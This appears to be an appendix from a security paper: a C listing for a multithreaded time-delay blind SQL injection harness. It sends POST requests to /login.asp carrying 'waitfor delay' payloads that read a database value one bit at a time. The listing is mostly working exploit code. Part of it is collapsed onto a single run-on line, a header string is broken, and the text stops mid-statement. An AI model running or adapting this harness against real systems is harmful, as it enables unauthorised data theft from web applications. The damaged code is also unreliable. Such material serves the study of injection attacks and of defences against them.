APPENDIX A

Example C Code for a Time-Delay SQL Injection Harness

// Entry point of the appendix harness: argv = <query> <bit_start> <bit_end>.
// For each bit index in [bit_start, bit_end) it starts thread_proc (defined
// outside this excerpt) with the index as its argument, waits for it to
// finish, and stops once two adjacent bytes of the shared `out` buffer read
// back as zero.  The globals `out`, `query`, `bit_start`, `bit_end`,
// `thread_proc` and `syntax` are declared elsewhere in the listing.
// NOTE(review): the "Done!" test at the end of the loop also reads
// out[(i / 8) - 1], which is out[-1] (out of bounds) while i < 8 — the
// loop silently assumes bit_start >= 8.  Neither the _beginthread() result
// nor the atoi() conversions are checked for failure.
int main( int argc, char *argv[] )
{
      int i, t;
      HANDLE h_thread[32];   // only h_thread[0] is ever filled (inner loop bound is 1)

      // assumes `out` is at least 1024 * 64 bytes — TODO confirm against its declaration
      memset( out, 0, 1024 * 64 );

      if ( argc != 4 )
            return syntax();   // usage text; its return value becomes the exit status

      // atoi() reports no errors: a non-numeric argument silently becomes 0
      query = argv[1];
      bit_start = atoi( argv[2] );
      bit_end = atoi( argv[3] );

      for( i = bit_start; i < bit_end; i += 1 )
      {
            // One worker per outer iteration; the 32-slot array suggests a
            // wider batch was intended at some point — unverified.
            for( t = 0; t < 1; t++ )
            {
            // the bit index itself (not a pointer to it) is passed as the thread argument
            h_thread[t] = (HANDLE)_beginthread( thread_proc, 0,
(void *)(i+t) );
            }

            // block up to 30 s for the single worker; timeout aborts the whole run
            if ( WaitForMultipleObjects( 1, h_thread, TRUE, 30000
) == WAIT_TIMEOUT )
            {
            // remainder of main and the start of create_get_bit_request are
            // collapsed onto the following line in this excerpt; see header note
printf( "Error - timeout waiting for response\n" ); return 1; } if ( ( out[ i / 8 ] == 0 ) && ( out[ (i / 8) - 1 ] == 0 ) ) { printf("Done!\n"); return 0; } } return 0; } int create_get_bit_request( char *query, int bit, char *request, int buff_len ) { char params[ 1024 * 64 ] = ""; char content_length[32] = ""; char tmp[32] = ""; char query_string[1024 * 64] = ""; int i; // create bit-retriveal query string safe_strcat( query_string, "'; ", buff_len ); safe_strcat( query_string, query, buff_len ); sprintf( params, " if (ascii(substring(@s, %d, 1)) & ( power(2, %d))) > 0 waitfor delay '0:0:4'--", (bit / 8)+1, bit % 8 ); safe_strcat( query_string, params, buff_len ); params[0] = 0; safe_strcat( request, "POST /login.asp HTTP/1.1\r\n", buff_len ); safe_strcat( request, "Content-Type: application/x-www-form- urlencoded\r\n", buff_len ); safe_strcat( request, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Q312461)\r\n", buff_len ); safe_strcat( request, "Host: 192.168.0.1\r\n", buff_len ...
